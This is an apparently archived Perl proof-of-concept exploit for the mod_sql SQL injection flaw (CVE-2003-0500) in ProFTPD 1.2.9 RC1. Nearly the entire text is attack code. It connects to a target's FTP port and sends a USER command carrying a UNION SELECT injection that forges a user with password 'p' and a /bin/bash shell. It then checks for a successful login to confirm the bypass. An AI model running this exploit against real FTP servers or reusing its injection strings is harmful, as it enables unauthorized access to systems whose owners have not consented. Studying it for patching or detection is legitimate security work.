ProFTPd 1.2.9 RC1 - 'mod_sql' SQL Injection - CVE-2003-0500

1. #!/usr/bin/perl
2. # ProFTPD 1.2.9 rc1 mod_sql SQL Injection remote Exploit
3. # Spaine - 2003
4.  
5. use IO::Socket;
6. if(@ARGC<2){
7.     print "\nProof Of Concept Sql Inject on ProFTPD\n";
8.     print "Usage: perl poc-sqlftp <target> [1=Alternate query]\n\n";
9.     exit(0);
10. };
11.  
12. $server = $ARGV[0];
13. $query = $ARGV[1];
14. $remote =
15. IO::Socket::INET->new(Proto=>"tcp",PeerAddr=>$server,PeerPort=>"21",Reuse=>1)
16.                           or die "Can't connect. \n";
17. if(defined($line=<$remote>)){
18.     print STDOUT $line;
19. }
20.  
21. # Proof of concept query, it may change on the number of rows
22. # By default, it can query User, Pass, Uid, Gid, Shell or
23. # User, Pass, Uid, Gid, Shell, Path, change the union query...
24.  
25. if($query eq "1"){
26.     print $remote "USER ')UNION
27. SELECT'u','p',1002,1002,'/tmp','/bin/bash'WHERE(''='\n";
28. }else{
29.     print $remote "USER ')UNION SELECT'u','p',1002,1002,'/bin/bash'
30. WHERE(''='\n";
31. };
32. if(defined($line=<$remote>)){
33.     print STDOUT $line;
34. }
35. print $remote "PASS p\n";
36. if(defined($line=<$remote>)){
37.     print STDOUT $line;
38. }
39. print "Sent query to $ARGV[0]\n";
40. if($line =~ /230/){  #logged in
41.     print "[------- Sql Inject Able \n";
42. }else{
43.     print "[------- Sql Inject Unable \n";
44. }
45. close $remote;
46.  
47. # milw0rm.com [2003-06-19]
48.